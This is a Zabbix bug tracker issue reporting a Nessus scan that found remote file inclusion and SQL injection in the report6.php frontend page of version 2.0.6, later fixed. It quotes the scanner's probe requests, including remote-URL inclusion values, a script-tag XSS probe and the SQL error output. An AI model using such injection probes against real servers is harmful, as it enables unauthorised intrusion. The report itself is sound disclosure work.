Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-6652

CGI Generic Remote File Inclusion & CGI Generic SQL Injection vulnerabilities

    XMLWordPrintable

    Details

    • Type: Incident report
    • Status: Closed
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 2.0.6
    • Fix Version/s: 2.0.7rc1, 2.1.2
    • Component/s: Frontend (F)
    • Environment:
      CentOS 6.4 x86_64, Apache, MySQL

      Description

      My ISO scanned my public-facing Zabbix server with Nessus and found the following security holes:

      39469 (1) - CGI Generic Remote File Inclusion
      Synopsis
      Arbitrary code may be run on the remote server.
      Description
      The remote web server hosts CGI scripts that fail to adequately sanitize request strings. By leveraging this issue, an attacker may be able to include a remote file from a remote server and execute arbitrary commands on the target host.
      See Also
      http://en.wikipedia.org/wiki/Remote_File_Inclusion
      http://projects.webappsec.org/Remote-File-Inclusion
      Solution
      Restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.
      Risk Factor
      High
      CVSS Base Score
      7.5 (CVSS2#AV:N/AC:L/Au:N/C/I/A)
      References
      XREF CWE:98
      XREF CWE:78
      XREF CWE:434
      XREF CWE:632
      XREF CWE:73
      XREF CWE:473
      XREF CWE:801
      XREF CWE:714
      XREF CWE:727
      Plugin Information:
      Publication date: 2009/06/19, Modification date: 2013/01/25
      Hosts
      zabbix.myschool.edu (tcp/443)

      Using the GET HTTP method, Nessus found that :

      + The following resources may be vulnerable to web code injection :

      + The 'items[0][itemid]' parameter of the /report6.php CGI :

      /report6.php?items[0][itemid]=http://p_lFYrwr.example.com/

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] include/db.inc.php:573]</li><li class="error">No item with itemid="http://p_lFYrwr.example.com/&quot;.</li><li class="error">Undefined index: color [includ [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      + The 'items[0][itemid]' parameter of the /zabbix/report6.php CGI :

      /zabbix/report6.php?items[0][itemid]=http://p_lFYrwr.example.com/

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] include/db.inc.php:573]</li><li class="error">No item with itemid="http://p_lFYrwr.example.com/&quot;.</li><li class="error">Undefined index: color [includ [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      42479 (1) - CGI Generic SQL Injection (2nd pass)
      Synopsis
      A web application is potentially vulnerable to SQL injection.
      Description
      By providing specially crafted parameters to CGIs, Nessus was able to get an error from the underlying database. This error suggests that the CGI is affected by a SQL injection vulnerability.

      An attacker may exploit this flaw to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.
      See Also
      http://en.wikipedia.org/wiki/SQL_injection
      http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      http://www.nessus.org/u?e5c79f44
      http://www.nessus.org/u?11ab1866
      Solution
      Modify the relevant CGIs so that they properly escape arguments.
      Risk Factor
      High
      CVSS Base Score
      7.5 (CVSS2#AV:N/AC:L/Au:N/C/I/A)
      References
      XREF CWE:89
      XREF CWE:20
      XREF CWE:77
      XREF CWE:810
      XREF CWE:713
      XREF CWE:722
      XREF CWE:727
      XREF CWE:751
      XREF CWE:801
      Plugin Information:
      Publication date: 2009/11/12, Modification date: 2013/03/29
      Hosts
      zabbix.myschool.edu (tcp/443)

      During testing for web code injection vulnerabilities,
      SQL errors were noticed, suggesting that the scripts / parameters
      listed below may also be vulnerable to SQL Injection (SQLi).

      -------- request --------
      GET /report6.php?items[0][itemid]=http://p_lFYrwr.example.com/ HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      Cookie: zbx_sessionid=d0d318bc93ce17cd3e18822abf1e6538
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, /
      ------------------------

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] wr.example.com/] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      -------- request --------
      GET /zabbix/report6.php?items[0][description]=http://rfi.nessus.org/rfi.txt HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, /
      ------------------------

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] WHERE i.itemid=] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      -------- request --------
      GET /zabbix/report6.php?items[0][itemid]=http://p_lFYrwr.example.com/ HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      Cookie: zbx_sessionid=59cb8edba53dbf30c6ec0e378fbd6607
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, /
      ------------------------

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] wr.example.com/] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      During testing for persistent XSS vulnerabilities,
      SQL errors were noticed, suggesting that the scripts / parameters
      listed below may also be vulnerable to SQL Injection (SQLi).

      -------- request --------
      GET /report6.php?items[0][itemid]=<script>alert(G2f7265706f7274362e7068703f6974656d735b305d5b6974656d69645d3d3c7363726970743e616c657274282455524c24293b3c2f7363726970743e2667726f757069643d302662746e313d53656c6563742670616c657474653d322672656d6f76653d253230253236726171756f2533622532302667726f75706964735f72696768743d267265706f72745f73686f773d53686f77267265706f72745f74696d6574696c6c3d3230313330353330303430333539267265706f72745f74696d6573696e63653d3230313330353239303430333539267265706f72745f74696c6c5f686f75723d3034267265706f72745f74696c6c5f6d6f6e74683d3035267265706f72745f73696e63655f6461793d3239267265706f72745f73696e63655f6d6f6e74683d30352672657365743d526573657426796c6162656c3d2673686f776c6567656e643d3126666f726d5f726566726573683d3126636f6e6669673d32267072696e743d31267369643d3632373133303238393531343236616126646472657365743d31267265706f72745f74696c6c5f796561723d32303133267363616c65747970653d32267265706f72745f73696e63655f796561723d3230313326666f726d3d31266164645f6974656d3d416464267265706f72745f74696c6c5f6461793d3330267265706f72745f74696c6c5f6d696e7574653d3033267265706f72745f73696e63655f6d696e7574653d3033267265706f72745f73696e63655f686f75723d303426786c6162656c3d267469746c653d5265706f727425323032266974656d735b305d5b6465736372697074696f6e5d3d2670616c65747465747970653d322667726f75706964735f6c6566743d266164643d26736f72746f726465723d3026686f73746964735f6c6566743d26617667706572696f643d3226686f73746964735f72696768743d266164645f706572696f643d41646426736f7274747970653d30);</script>&groupid=0&btn1=Select&palette=2&remove=%20%26raquo%3b%20&groupids_right=&report_show=Show&report_timetill=20130530040359&report_timesince=20130529040359&report_till_hour=04&report_till_month=05&report_since_day=29&report_since_month=05&reset=Reset&ylabel=&showlegend=1&form_refresh=1&config=2&print=1&sid=62713028951426aa&ddreset=1&report_till_year=2013&scaletype=2&report_since_year=2013&form=1&add_item=Add&report_till_day=30&report_till_minute=03&report_since_minute=03&report_since_hour=04&xlabel=&title=Report%202&items[0][description]=&palettetype=2&groupids_left=&add=&sortorder=0&hostids_left=&avgperiod=2&hostids_right=&add_period=Add&sorttype=0 HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, /
      ------------------------

      -------- output --------
      <body class="originalblue">
      <div id="message-global-wrap"><div id="message-global"></div></div>
      [...] </script>] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

        Attachments

          Activity

            People

            Assignee:
            Unassigned Unassigned
            Reporter:
            genebean Gene Liverman
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved: